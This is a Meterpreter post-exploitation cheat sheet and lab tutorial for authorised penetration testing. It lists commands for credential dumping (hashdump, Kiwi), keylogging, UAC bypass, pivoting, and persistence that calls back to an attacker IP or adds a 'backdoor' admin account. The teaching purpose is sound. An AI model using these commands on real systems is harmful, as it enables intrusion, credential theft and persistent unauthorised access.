How experienced are you with Meterpreter post-exploitation?
⚠️ Authorised Systems Only. Every Meterpreter command in this guide must only be used on systems you own or have explicit written authorisation to test. Using these techniques against systems without permission is a criminal offence under computer misuse legislation worldwide. This is a reference guide for authorised penetration testers and students using their own lab environments.
Meterpreter Commands or Cheat Sheet for 2026 :— You’ve landed a shell. Now what? Most guides stop at getting Meterpreter to connect back. The real work — the part that determines whether a penetration test produces actionable findings — is what happens after. System recon that maps the complete environment, credential harvesting that demonstrates actual account compromise, network pivoting that shows the internal attack paths, and persistence that proves an attacker could maintain access. This Meterpreter cheat sheet covers every command you need for the complete Meterpreter post-exploitation workflow with real examples for every stage.
🎯 What This Meterpreter Cheat Sheet Covers
Core commands — session management, help, shell, background
System recon — sysinfo, getuid, ps, getsystem, hashdump
File operations — upload, download, search, cat, edit
Privilege escalation — getsystem, migrate, local_exploit_suggester
Persistence — run persistence, scheduled tasks, registry run keys
Network pivoting — route, portfwd, socks proxy
⏱️ Reference guide · Bookmark and use on every engagement
📋 Meterpreter Commands 2026 — Sections
Core and Session Commands
These are the commands that control the Meterpreter session itself — backgrounding, interacting with multiple sessions, dropping to a standard shell, and getting help on any command. Every post-exploitation workflow starts here.
CORE METERPRETER COMMANDS
# Get help — list all available commands
help
help [command]
# Background the current session (returns to msfconsole)
background
bg
# List all active sessions
sessions -l
# Interact with a specific session
sessions -i 1
# Drop to a standard OS shell
shell
# Return to Meterpreter from shell: Ctrl+C or ‘exit’
# Execute a single command and return output
execute -f cmd.exe -a “/c whoami” -H -i
# Kill the session and remove the payload
exit
exit -y
System Reconnaissance
System recon maps the target environment — OS version, current user privileges, running processes, network configuration, and logged-in users. This information feeds directly into privilege escalation decisions and lateral movement planning. Run these commands first on every new Meterpreter session before anything else.
SYSTEM RECON COMMANDS
# System information — OS, hostname, architecture, language
sysinfo
Computer : WIN-SERVER2022
OS : Windows Server 2022 (10.0 Build 20348)
Architecture : x64
# Current user context
getuid
Server username: DOMAIN\jsmith
# Current process ID and name
getpid
Current pid: 2456
# List all running processes
ps
PID PPID Name Arch Session User
4 0 System x64 0 NT AUTHORITY\SYSTEM
768 500 services.exe x64 0 NT AUTHORITY\SYSTEM
2456 1234 chrome.exe x64 1 DOMAIN\jsmith
# Network interfaces and routing
ifconfig
ipconfig
arp
route
# Environment variables
env
# Logged-in users
run post/windows/gather/enum_logged_on_users
# Check if we’re in a VM or sandbox
run post/multi/gather/vmware_detection
run post/windows/gather/checkvm
securityelites.com
Meterpreter — First 5 Commands on Every New Session
sysinfo
OS version, hostname, architecture — determines which exploits apply
getuid
Current user context — is it admin/SYSTEM already or not?
ps
Running processes — identify SYSTEM processes for migration targets
ifconfig
Network interfaces — discover internal subnets for pivoting
getpid
Current process — assess stability, plan migration if needed
📸 The first five Meterpreter commands on every new session. Running these immediately after getting a shell establishes the baseline: what OS, who are we, what privileges, what network access. The answers to these five commands determine every subsequent action — whether to escalate, what processes to target for migration, and which internal networks can be reached for pivoting.
⚡ EXERCISE 1 — KALI TERMINAL (15 MIN)
Open Meterpreter on a Metasploitable VM and Run Full System Recon
⏱️ 15 minutes · Kali + Metasploitable2 lab · Your own VMs only
EXERCISE 1 — METERPRETER SYSTEM RECON
# Step 1: Get a Meterpreter session on Metasploitable2
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.x.x
set PAYLOAD cmd/unix/interact
run
# OR use a different module that gives Meterpreter on your lab target
# Step 2: Run the first-5 commands
sysinfo
getuid
getpid
ps
ifconfig
# Step 3: Extended recon
arp
netstat
env
# Step 4: Note what internal subnets you can see in ifconfig
# These are the networks you can pivot into
✅ What you just learned: The first-5 commands establish the complete post-exploitation baseline in under 60 seconds. The ifconfig output is particularly important — any network interface beyond the one you connected through reveals an internal network the target has access to. That’s your pivoting target. The ps list shows which processes are running as SYSTEM — migrating into one of those is the path to privilege escalation without running any exploit.
📸 Screenshot the sysinfo and ifconfig output. Post to #day-19-hashcat or #meterpreter on Discord.
File Operations
Meterpreter’s file operations run entirely in memory — uploads and downloads go through the encrypted channel without touching the file system in obvious ways. The search command can locate sensitive files across the entire filesystem efficiently. These commands support the evidence-gathering phase of a penetration test: finding configuration files, extracting credentials from known locations, and transferring tools to and from the target.
FILE OPERATION COMMANDS
# Print working directory
pwd
getwd
# List directory contents
ls
dir
# Change directory
cd “C:\\Users\\Administrator\\Documents”
# Read file contents
cat “C:\\Windows\\System32\\drivers\\etc\\hosts”
# Search for files by name or extension
search -f “*.config” -d “C:\\inetpub”
search -f “web.config”
search -f “id_rsa” -d “/home”
search -f “*.kdbx”
# Search for KeePass databases
# Upload file to target
upload /opt/tools/winpeas.exe “C:\\Temp\\winpeas.exe”
# Download file from target
download “C:\\Windows\\System32\\config\\SAM” /tmp/SAM
download “C:\\Users\\Administrator\\NTDS\\ntds.dit” /tmp/ntds.dit
# Delete file
rm “C:\\Temp\\tool.exe”
# Edit file in local editor (downloads, edits locally, re-uploads)
edit “C:\\Temp\\config.xml”
Privilege Escalation Commands
Privilege escalation in Meterpreter uses three main approaches: getsystem (automated multi-technique escalation), process migration (moving to an already-privileged process), and the local_exploit_suggester module (identifying unpatched local vulnerabilities). Always run getsystem first — it works surprisingly often on misconfigured Windows environments. If getsystem fails, run local_exploit_suggester to identify specific vulnerabilities to exploit.
PRIVILEGE ESCALATION COMMANDS
# Attempt automatic privilege escalation (tries multiple techniques)
getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))
# Check if escalation worked
getuid
Server username: NT AUTHORITY\SYSTEM
# Identify local privilege escalation vulnerabilities
run post/multi/recon/local_exploit_suggester
[+] 192.168.1.100 – exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable
[+] 192.168.1.100 – exploit/windows/local/ms16_032_secondary_logon: The target appears to be vulnerable
# Process migration — move to a SYSTEM process
# First identify a SYSTEM process from ‘ps’ output
migrate 4
[*] Migrating from 2456 to 4…
[*] Migration completed successfully.
# Migrate by process name (more reliable than PID)
migrate -N lsass.exe
migrate -N winlogon.exe
# Bypass UAC (Windows 10/11 with standard user)
run post/windows/manage/bypassuac_injection
use exploit/windows/local/bypassuac_sluihijack
Credential Harvesting
Credential harvesting is the high-value output of post-exploitation — the evidence that proves actual account compromise in a penetration test report. Meterpreter’s hashdump provides NTLM hashes directly from the Windows SAM database. Kiwi (the Meterpreter Mimikatz integration) extracts cleartext passwords and Kerberos tickets from LSASS memory. Both require SYSTEM privileges.
CREDENTIAL HARVESTING COMMANDS
# Dump local SAM hashes (requires SYSTEM)
hashdump
Administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Load Kiwi (Mimikatz in Meterpreter)
load kiwi
# Dump all credentials (cleartext where available)
creds_all
# Specifically dump WDIGEST plaintext passwords
creds_wdigest
# Dump NTLM hashes via kiwi
creds_msv
# Extract Kerberos tickets
kerberos_ticket_list
kerberos_ticket_dump
# Keylogger (capture keystrokes)
keyscan_start
keyscan_dump
keyscan_stop
# Screenshot
screenshot
⚡ EXERCISE 2 — KALI TERMINAL (15 MIN)
Privilege Escalation and Credential Harvesting on Lab VM
⏱️ 15 minutes · Kali + Windows lab VM · Your own VMs only
EXERCISE 2 — PRIVESC AND HASHDUMP
# Assuming you have a Meterpreter session from Exercise 1
# Step 1: Check current privileges
getuid
getprivs
# Step 2: Attempt getsystem
getsystem
getuid
# Confirm SYSTEM if successful
# Step 3: Run exploit suggester
bg
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Step 4: Extract credentials
sessions -i 1
hashdump
load kiwi
creds_all
# Step 5: Save hashes for Hashcat (Day 19)
hashdump > /tmp/lab_hashes.txt
# Now crack with: hashcat -m 1000 /tmp/lab_hashes.txt rockyou.txt
✅ What you just learned: The getsystem → getuid → hashdump chain is the core privilege escalation and credential harvest sequence in Windows post-exploitation. The local_exploit_suggester output gives you specific CVEs to follow up with if getsystem fails. The hashes from hashdump feed directly into Hashcat (Day 19) — the complete chain from foothold to cracked passwords runs across Days 17–19 tools.
📸 Screenshot the hashdump output (blur sensitive data). Post to #meterpreter on Discord.
Network Pivoting and Port Forwarding
Pivoting turns a single compromised host into a gateway to internal networks. When ifconfig reveals additional network interfaces — private subnets the external attacker cannot reach directly — Meterpreter’s routing and proxy modules allow all tools on Kali to reach those internal networks through the compromised host.
PIVOTING AND PORT FORWARDING
# Add a route through the current session to an internal subnet
route add 10.10.10.0/24 1
route print
# Create a SOCKS proxy through the session
bg
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j
# Now route all tools through proxychains
proxychains nmap -sT -Pn 10.10.10.0/24
# Port forwarding — forward local port to remote service
portfwd add -l 3389 -p 3389 -r 10.10.10.5
# Now: rdesktop 127.0.0.1:3389 connects to 10.10.10.5:3389
# List port forwards
portfwd list
# Delete a port forward
portfwd delete -l 3389
Persistence Mechanisms
Persistence ensures the Meterpreter session survives a reboot and reconnects automatically. In authorised penetration testing, persistence demonstrates that an attacker could maintain long-term access after initial compromise. Always document what persistence mechanisms you install and remove them cleanly before completing the engagement.
PERSISTENCE COMMANDS
# Built-in persistence module (Windows)
run persistence -h
run persistence -X -i 30 -p 4444 -r [attacker_IP]
# -X = autostart at boot, -i 30 = retry every 30s
# Post module persistence (more stealthy)
run post/windows/manage/persistence_exe STARTUP=SCHEDULER
# Add registry run key
run post/windows/manage/persistence STARTUP=REGISTRY
# Create new user (last resort, highly visible)
run post/windows/manage/add_user_to_group USERNAME=backdoor GROUP=Administrators
# CLEANUP — always remove persistence after engagement
run multi_console_command -rc /root/.msf4/logs/persistence/cleanup.rc
⚡ EXERCISE 3 — KALI TERMINAL (15 MIN)
Set Up Pivoting to an Internal Network in Your Lab
⏱️ 15 minutes · Kali + multi-VM lab
EXERCISE 3 — ROUTE AND SOCKS PROXY
# Assuming Meterpreter session on a VM with 2 network interfaces
# Interface 1: 192.168.1.x (your Kali network)
# Interface 2: 10.0.0.x (internal network Kali can’t reach)
# Step 1: Confirm internal interface in Meterpreter
ifconfig
# Note the internal 10.0.0.x subnet
# Step 2: Background and add route
bg
route add 10.0.0.0/24 1
route print
# Step 3: Start SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
# Step 4: Configure proxychains
echo “socks5 127.0.0.1 1080” >> /etc/proxychains4.conf
# Step 5: Scan internal network via pivot
proxychains nmap -sT -Pn -p 22,80,443,3389 10.0.0.0/24 2>/dev/null
# Internal hosts now visible via the compromised pivot
✅ What you just learned: The route + SOCKS proxy combination turns the compromised host into a transparent gateway to internal networks. Any tool that supports proxychains can now reach the internal 10.0.0.x network as if Kali were directly connected. This is how penetration testers demonstrate lateral movement potential: “from this one compromised host, I can reach the internal HR, finance, and domain controller subnets.” The pivoting evidence is often the most impactful finding in a network penetration test.
📸 Screenshot the proxychains nmap output showing internal hosts discovered via pivot. Post to #meterpreter on Discord. Tag #day11complete
Always Clean Up After Persistence: Every persistence mechanism you install — registry keys, scheduled tasks, services, new user accounts — must be documented and removed at the end of the engagement. The Metasploit persistence modules create a cleanup script at /root/.msf4/logs/persistence/. Run it before leaving. Leaving persistence behind in client environments is one of the most serious mistakes a penetration tester can make and often results in contract termination.
🧠 QUICK CHECK — Meterpreter
You have a Meterpreter session running as a low-privilege domain user. getsystem fails. ps shows that services.exe (PID 768) is running as NT AUTHORITY\SYSTEM. What is the most direct next step to attempt privilege escalation?
📋 Meterpreter Quick Reference — Complete Command List
sysinfo / getuid / getpid / ps / ifconfigFirst 5 commands on every new session — establish baseline context
getsystem → getuidAttempt automatic privilege escalation → confirm SYSTEM
migrate [PID] / migrate -N [name]Move session into a privileged process by PID or name
hashdump / load kiwi / creds_allCredential harvesting — SAM hashes + cleartext passwords from LSASS
route add [subnet] [session] → socks_proxyPivot to internal networks via the compromised host
portfwd add -l [local] -p [remote] -r [IP]Forward local port to remote service via the session
🏆 Mark as Read — Meterpreter Commands Cheat Sheet 2026
The complete Meterpreter post-exploitation command reference. Bookmark this page — every command you need for a Windows post-exploitation engagement is here with real examples.
❓ Frequently Asked Questions — Meterpreter 2026
What is Meterpreter?
Metasploit’s advanced post-exploitation payload. Runs entirely in memory (no disk files), communicates over encrypted channels, and provides built-in modules for system recon, file operations, privilege escalation, persistence, credential harvesting, and network pivoting.
How do you get a Meterpreter shell?
Generate payload with msfvenom, set up a handler (use exploit/multi/handler), deliver the payload via your attack vector, wait for the callback. The payload connects back to your handler and opens the Meterpreter session.
What is the difference between shell and Meterpreter?
A shell is a basic command interface. Meterpreter provides an advanced payload with built-in post-exploitation commands, runs in memory without disk artifacts, uses encrypted communication, and offers modules for every phase of post-exploitation.
How do you escalate privileges with Meterpreter?
Try getsystem first (multiple automatic techniques). If it fails: check ps for SYSTEM processes and migrate; run local_exploit_suggester to find specific CVEs; use bypassuac modules if applicable. Check with getuid after each attempt.
How do you pivot through a network with Meterpreter?
route add [subnet] [session_id] adds a route through the session. Then use auxiliary/server/socks_proxy to create a SOCKS proxy. Configure proxychains to use 127.0.0.1:1080 and all tools become reachable to the internal network.
How do you clean up Meterpreter persistence?
The persistence modules create a cleanup script at /root/.msf4/logs/persistence/. Run it with: run multi_console_command -rc [cleanup_file]. Document all installed persistence and verify removal before completing any engagement.
← Related
Metasploit Tutorial Kali Linux 2026
Related →
Free Ethical Hacking Course
📚 Further Reading
- Day 10: Metasploit Tutorial Kali Linux 2026 — The Metasploit fundamentals course — msfconsole, modules, and initial exploitation that produces the Meterpreter session this Meterpreter cheat sheet applies to.
- Day 30: Post-Exploitation and Persistence — The ethical hacking course lesson on maintaining access after initial compromise — covers the persistence techniques referenced in this Meterpreter cheat sheet in depth.
- Metasploit Documentation — Meterpreter Commands — The official Metasploit command reference — complete documentation for every Meterpreter module and command.